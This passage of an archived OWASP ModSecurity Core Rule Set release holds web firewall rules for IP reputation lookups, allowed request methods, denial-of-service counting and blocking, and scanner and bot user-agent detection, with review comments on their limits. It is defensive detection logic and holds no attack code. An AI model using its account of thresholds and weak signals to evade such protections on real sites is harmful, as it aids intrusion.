# SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \ "id:910120,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-RBL-LOOKUP" # # Check Client IP against ProjectHoneypot's HTTP Blacklist # Ref: http://www.projecthoneypot.org/httpbl_api.php # # To use the blacklist, you must register for an HttpBL API Key # and choose the traffic types to block. See section # "Project Honey Pot HTTP Blacklist" in crs-setup.conf. # # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey # # Skip HttpBL checks if user has not defined one of the TX:block_* variables. # This prevents error "Operator error: RBL httpBl called but no key defined: set SecHttpBlKey" SecRule &TX:block_suspicious_ip "@eq 0" \ "id:910130,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ chain,\ skipAfter:END-RBL-CHECK" SecRule &TX:block_harvester_ip "@eq 0" \ "chain" SecRule &TX:block_spammer_ip "@eq 0" \ "chain" SecRule &TX:block_search_ip "@eq 0" SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \ "id:910140,\ phase:2,\ pass,\ capture,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.httpbl_msg=%{tx.0}',\ chain" SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. 
(.*?): .*" \ "capture,\ t:none,\ setvar:'tx.httpbl_msg=%{tx.1}'" # The following regexs are generated based off re_operators.c SecRule TX:block_search_ip "@eq 1" \ "id:910150,\ phase:2,\ block,\ t:none,\ msg:'HTTP Blacklist match for search engine IP',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" SecRule TX:httpbl_msg "@rx Search Engine" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ expirevar:'ip.previous_rbl_check=86400'" SecRule TX:block_spammer_ip "@eq 1" \ "id:910160,\ phase:2,\ block,\ t:none,\ msg:'HTTP Blacklist match for spammer IP',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" SecRule TX:httpbl_msg "@rx (?i)^.*? spammer .*?$" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ expirevar:'ip.previous_rbl_check=86400'" SecRule TX:block_suspicious_ip "@eq 1" \ "id:910170,\ phase:2,\ block,\ t:none,\ msg:'HTTP Blacklist match for suspicious IP',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" SecRule TX:httpbl_msg "@rx (?i)^.*? 
suspicious .*?$" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ expirevar:'ip.previous_rbl_check=86400'" SecRule TX:block_harvester_ip "@eq 1" \ "id:910180,\ phase:2,\ block,\ t:none,\ msg:'HTTP Blacklist match for harvester IP',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" SecRule TX:httpbl_msg "@rx (?i)^.*? harvester .*?$" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ expirevar:'ip.previous_rbl_check=86400'" SecAction \ "id:910190,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ ver:'OWASP_CRS/3.3.5',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.previous_rbl_check=86400'" SecMarker "END-RBL-LOOKUP" SecMarker "END-RBL-CHECK" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910013,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910014,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910015,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910016,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule 
TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910017,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910018,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-910-IP-REPUTATION" modsecurity-crs-3.3.5/rules/REQUEST-911-METHOD-ENFORCEMENT.conf000066400000000000000000000051741446122515100230500ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Allowed Request Methods ]=- # # tx.allowed_methods is defined in the crs-setup.conf file # SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ "id:911100,\ phase:2,\ block,\ msg:'Method is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-generic',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/274',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ 
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT" modsecurity-crs-3.3.5/rules/REQUEST-912-DOS-PROTECTION.conf000066400000000000000000000246541446122515100224430ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # Anti-Automation rules to detect Denial of Service attacks. 
# # Description of mechanics: # When a request hits a non-static resource (TX:STATIC_EXTENSIONS), then a counter for the IP # address is being raised (IP:DOS_COUNTER). If the counter (IP:DOS_COUNTER) hits a limit # (TX:DOS_COUNTER_THRESHOLD), then a burst is identified (IP:DOS_BURST_COUNTER) and the # counter (IP:DOS_COUNTER) is reset. The burst counter expires within a timeout period # (TX:DOS_BURST_TIME_SLICE). # If the burst counter (IP:DOS_BURST_COUNTER) is greater equal 2, then the blocking flag # is being set (IP:DOS_BLOCK). The blocking flag (IP:DOS_BLOCK) expires within a timeout # period (TX:DOS_BLOCK_TIMEOUT). All this counting happens in phase 5. # There is a stricter sibling to this rule (912170) in paranoia level 2, where the # burst counter check (IP:DOS_BURST_COUNTER) hits at greater equal 1. # # The blocking is done in phase 1: When the blocking flag is encountered (IP:DOS_BLOCK), # then the request is dropped without sending a response. If this happens, then a # counter is # raised (IP:DOS_BLOCK_COUNTER). # When an IP address is blocked for the first time, then the blocking is reported in a # message and a flag (IP:DOS_BLOCK_FLAG) is set. This flag expires in 60 seconds. # When an IP address is blocked and the flag (IP:DOS_BLOCK_FLAG) is set, then the # blocking is not being reported (to prevent a flood of alerts). When the flag # (IP:DOS_BLOCK_FLAG) has expired and a new request is being blocked, then the # counter (IP:DOS_BLOCK_COUNTER) is being reset to 0 and the block is being treated # as the first block (-> alert). # In order to be able to display the counter (IP:DOS_BLOCK_COUNTER) and resetting # it at the same time, we copy the counter (IP:DOS_BLOCK_COUNTER) into a different # variable (TX:DOS_BLOCK_COUNTER), which is then displayed in turn. # # Variables: # IP:DOS_BLOCK Flag if an IP address should be blocked # IP:DOS_BLOCK_COUNTER Counter of blocked requests # IP:DOS_BLOCK_FLAG Flag keeping track of alert. Flag expires after 60 seconds. 
# IP:DOS_BURST_COUNTER Burst counter # IP:DOS_COUNTER Request counter (static resources are ignored) # TX:DOS_BLOCK_COUNTER Copy of IP:DOS_BLOCK_COUNTER (needed for display reasons) # TX:DOS_BLOCK_TIMEOUT Period in seconds a blocked IP will be blocked # TX:DOS_COUNTER_THRESHOLD Limit of requests, where a burst is identified # TX:DOS_BURST_TIME_SLICE Period in seconds when we will forget a burst # TX:STATIC_EXTENSIONS Paths which can be ignored with regards to DoS # # As a precondition for these rules, please set the following three variables: # - TX:DOS_BLOCK_TIMEOUT # - TX:DOS_COUNTER_THRESHOLD # - TX:DOS_BURST_TIME_SLICE # # And make sure that TX:STATIC_EXTENSIONS is also set. # # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # # # Skip if variables defining DoS protection are not set # SecRule &TX:dos_burst_time_slice "@eq 0" \ "id:912100,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain,\ skipAfter:END-DOS-PROTECTION-CHECKS" SecRule &TX:dos_counter_threshold "@eq 0" \ "chain" SecRule &TX:dos_block_timeout "@eq 0" SecRule &TX:dos_burst_time_slice "@eq 0" \ "id:912110,\ phase:5,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain,\ skipAfter:END-DOS-PROTECTION-CHECKS" SecRule &TX:dos_counter_threshold "@eq 0" \ "chain" SecRule &TX:dos_block_timeout "@eq 0" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912011,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912012,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Anti-Automation / DoS Protection : Block ]=- # # # Block and track # of requests and log # SecRule IP:DOS_BLOCK "@eq 1" \ "id:912120,\ phase:1,\ drop,\ msg:'Denial of Service (DoS) attack identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',\ tag:'application-multi',\ tag:'language-multi',\ 
tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule &IP:DOS_BLOCK_FLAG "@eq 0" \ "setvar:'ip.dos_block_counter=+1',\ setvar:'ip.dos_block_flag=1',\ setvar:'tx.dos_block_counter=%{ip.dos_block_counter}',\ setvar:'ip.dos_block_counter=0',\ expirevar:'ip.dos_block_flag=60'" # # Block and track # of requests but don't log # SecRule IP:DOS_BLOCK "@eq 1" \ "id:912130,\ phase:1,\ drop,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ setvar:'ip.dos_block_counter=+1'" # # -=[ Anti-Automation / DoS Protection: Count requests ]=- # # # Skip if we have blocked the request # SecRule IP:DOS_BLOCK "@eq 1" \ "id:912140,\ phase:5,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DOS-PROTECTION-CHECKS" # # DOS Counter: Count the number of requests to non-static resources # SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \ "id:912150,\ phase:5,\ pass,\ capture,\ t:none,t:lowercase,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.extension=/%{TX.1}/',\ chain" SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \ "setvar:'ip.dos_counter=+1'" # # Check DOS Counter # If the request count is greater than or equal to user settings, # we raise the burst counter. This happens via two separate rules: # - 912160: raise from 0 to 1 # - 912161: raise from 1 to 2 # # This approach with two rules avoids raising the burst counter # from 0 to 2 via two concurrent requests. We do not raise the # burst counter beyond 2. 
#
#
# 912160 - first burst. Fires when the per-IP request counter has reached
# tx.dos_counter_threshold and no burst counter exists yet (the & prefix
# counts variables, so "@eq 0" means "not set"). It sets the burst counter to
# 1, deletes ip.dos_counter so that counting starts again, and lets the burst
# counter expire after tx.dos_burst_time_slice seconds.
# Runs in phase 5 (logging), so it never affects the current response.
#
SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \
    "id:912160,\
    phase:5,\
    pass,\
    t:none,\
    nolog,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-dos',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/227/469',\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule &IP:DOS_BURST_COUNTER "@eq 0" \
        "setvar:'ip.dos_burst_counter=1',\
        setvar:'!ip.dos_counter',\
        expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'"


# 912161 - second burst. Same threshold test, but requires that a burst
# counter already exists. It sets the burst counter to the fixed value 2
# (never higher), deletes ip.dos_counter and renews the burst counter expiry.
# Because 912160 deletes ip.dos_counter when it fires, this rule presumably
# cannot fire in the same transaction - confirm against the engine's handling
# of unset collection variables.
#
# NOTE(review): all counters live in the persistent IP collection. Clients
# that share the collection key (for example users behind one NAT address)
# share the counters, so tx.dos_counter_threshold should be sized for the
# busiest legitimate source - verify how the collection is keyed.
#
SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \
    "id:912161,\
    phase:5,\
    pass,\
    t:none,\
    nolog,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-dos',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/227/469',\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule &IP:DOS_BURST_COUNTER "@ge 1" \
        "setvar:'ip.dos_burst_counter=2',\
        setvar:'!ip.dos_counter',\
        expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'"


#
# Check DOS Burst Counter and set Block
# Check the burst counter - if greater than or equal to 2, then we set the IP
# block variable for a given expiry and issue an alert.
#
# The action is "pass": this rule only logs the alert and sets ip.dos_block
# (expiring after tx.dos_block_timeout seconds). It runs in phase 5, after the
# current request has been served; the actual drop is performed in phase 1 of
# later requests by rules 912120 and 912130, which test IP:DOS_BLOCK.
#
SecRule IP:DOS_BURST_COUNTER "@ge 2" \
    "id:912170,\
    phase:5,\
    pass,\
    t:none,\
    log,\
    msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'paranoia-level/1',\
    tag:'attack-dos',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/210/227/469',\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'ip.dos_block=1',\
    expirevar:'ip.dos_block=%{tx.dos_block_timeout}'"


# Paranoia-level gate for level 2. Besides the usual phase 1 and phase 2 skip
# rules there is a phase 5 skip rule (912019), because the level 2 rule that
# follows (912171) runs in phase 5.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912013,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912014,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912019,phase:5,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#

#
# Check DOS Burst Counter and set Block
# Check the burst counter - if greater than or equal to 1, then we set the IP
# block variable for a given expiry and issue an alert.
#
# This is a stricter sibling of rule 912170.
# SecRule IP:DOS_BURST_COUNTER "@ge 1" \ "id:912171,\ phase:5,\ pass,\ t:none,\ log,\ msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ setvar:'ip.dos_block=1',\ expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912015,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912016,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912017,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912018,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-912-DOS-PROTECTION" SecMarker "END-DOS-PROTECTION-CHECKS" modsecurity-crs-3.3.5/rules/REQUEST-913-SCANNER-DETECTION.conf000066400000000000000000000157431446122515100227370ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. 
# ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Vulnerability Scanner Checks ]=- # # These rules inspect the default User-Agent and Header values sent by # various commercial and open source vuln scanners. # # The following rules contain User-Agent lists: # 913100 - security scanners (data file scanners-user-agents.data) # 913101 - scripting/generic HTTP clients (data file scripting-user-agents.data) # 913102 - web crawlers/bots (data file crawlers-user-agents.data) # SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ "id:913100,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found User-Agent associated with security scanner',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data" \ "id:913110,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found request header associated with security scanner',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ 
tag:'platform-multi',\ tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \ "id:913120,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found request filename/argument associated with security scanner',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # # # -=[ Scripting/Generic User-Agents ]=- # # This rule detects user-agents associated with various HTTP client libraries # and scripting languages. Detection suggests attempted access by some # automated tool. # # This rule is a sibling of rule 913100. 
#
# Phrase-matches the lowercased User-Agent header against the entries of
# scripting-user-agents.data. On a match the critical anomaly score is added
# to tx.anomaly_score_pl2 and the per-IP reputation flag is set, expiring
# after tx.reput_block_duration seconds.
#
# NOTE(review): the User-Agent header is supplied by the client, so a match is
# a low-confidence signal and the absence of a match says nothing about the
# client. The flag is stored in the persistent IP collection; clients that
# share the collection key (set outside this file) presumably inherit it -
# confirm before relying on reputation blocking at this paranoia level.
#
SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \
    "id:913101,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'Found User-Agent associated with scripting/generic HTTP client',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-reputation-scripting',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/118/224/541/310',\
    tag:'PCI/6.5.10',\
    tag:'paranoia-level/2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
    setvar:'ip.reput_block_flag=1',\
    setvar:'ip.reput_block_reason=%{rule.msg}',\
    expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"

#
# -=[ Crawler User-Agents ]=-
#
# This rule detects user-agents associated with various crawlers, SEO tools,
# and bots, which have been reported to potentially misbehave.
# These crawlers can have legitimate uses when used with authorization.
#
# This rule is a sibling of rule 913100.
# SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \ "id:913102,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found User-Agent associated with web crawler/bot',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-crawler',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-913-SCANNER-DETECTION" modsecurity-crs-3.3.5/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf000066400000000000000000001521131446122515100233250ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. 
